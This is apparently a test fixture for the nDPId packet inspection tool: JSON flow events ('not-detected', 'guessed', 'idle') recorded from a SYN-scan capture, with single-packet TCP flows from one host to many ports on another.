+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
